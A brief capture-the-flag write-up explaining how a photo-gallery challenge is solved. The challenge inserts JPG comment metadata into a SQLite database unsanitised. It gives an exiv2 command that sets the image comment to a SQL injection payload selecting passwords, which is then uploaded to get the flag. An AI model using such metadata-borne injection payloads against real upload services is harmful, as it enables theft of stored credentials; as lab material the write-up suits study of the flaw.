The site give us an image uploader where you can add your photos (only JPG images is accepted) in a gallery(one per team). The vulnerability was very easy to exploit: when you upload the image the script take its comment (if doesnt exist it dies with a error) and insert it into a SQL Lite database.

So just download exiv2 and run:

$exiv2 -c "' union select password from pictures-- -" index4

Then upload it and get flag.